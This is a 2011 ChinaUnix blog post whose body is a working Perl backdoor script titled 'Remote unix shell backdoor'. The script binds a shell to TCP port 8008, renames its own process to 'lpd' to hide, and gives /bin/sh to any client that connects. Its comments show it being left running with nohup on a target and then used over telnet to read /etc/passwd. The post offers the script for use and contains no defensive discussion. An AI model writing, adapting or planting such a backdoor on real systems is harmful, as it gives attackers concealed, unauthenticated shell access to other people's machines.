Chinaunix首页 | 论坛 | 博客

邂逅xiehou.blog.chinaunix.net

首页 |  博文目录 |  关于我

daqiang430

  • 博客访问: 362544
  • 博文数量: 89
  • 博客积分: 3178
  • 博客等级: 中校
  • 技术积分: 965
  • 用 户 组: 普通用户
  • 注册时间: 2008-07-09 15:31
文章分类

全部博文(89)

文章存档

2013年(10)

2012年(33)

2011年(41)

2008年(5)

我的朋友
最近访客
推荐博文
相关博文
Remote unix shell backdoor

分类: LINUX

2011-10-24 14:05:44

  1. #!/usr/bin/perl
  2. #
  3. # * Author xiehou
  4. #
  5. # * Description:
  6. # Remote unix shell backdoor.
  7. #
  8. # * Usage:
  9. # remote target $ ./nohup bindshell.pl &
  10. # remote target$ exit
  11. # Connection closed by foreign host
  12. # localhost$ telnet remote target 8008
  13. # Trying 192.168.1.1...
  14. # Connected to remote target.
  15. # Escape character is '^]'.
  16. # (user@remote name:/home/user/)
  17. # cat /etc/passwd; etc

  19. use Socket;

  21. $port    = 8008;
  22. $proto    = getprotobyname('tcp');
  23. $cmd    = "lpd";
  24. $system    = 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh';

  26. $0 = $cmd;

  28. socket(SERVER, PF_INET, SOCK_STREAM, $proto)
  29.                     or die "socket:$!";
  30. setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
  31.                     or die "setsockopt: $!";
  32. bind(SERVER, sockaddr_in($port, INADDR_ANY))
  33.                     or die "bind: $!";
  34. listen(SERVER, SOMAXCONN)        or die "listen: $!";

  36. for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
  37. {
  38.     open(STDIN, ">&CLIENT");
  39.     open(STDOUT, ">&CLIENT");
  40.     open(STDERR, ">&CLIENT");

  42.     system($system);

  44.     close(STDIN);
  45.     close(STDOUT);
  46.     close(STDERR);
  47. }
阅读(671) | 评论(0) | 转发(0) |
0

上一篇:SSHD 后门

下一篇:ipad2越狱之后ls命令的颜色问题

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6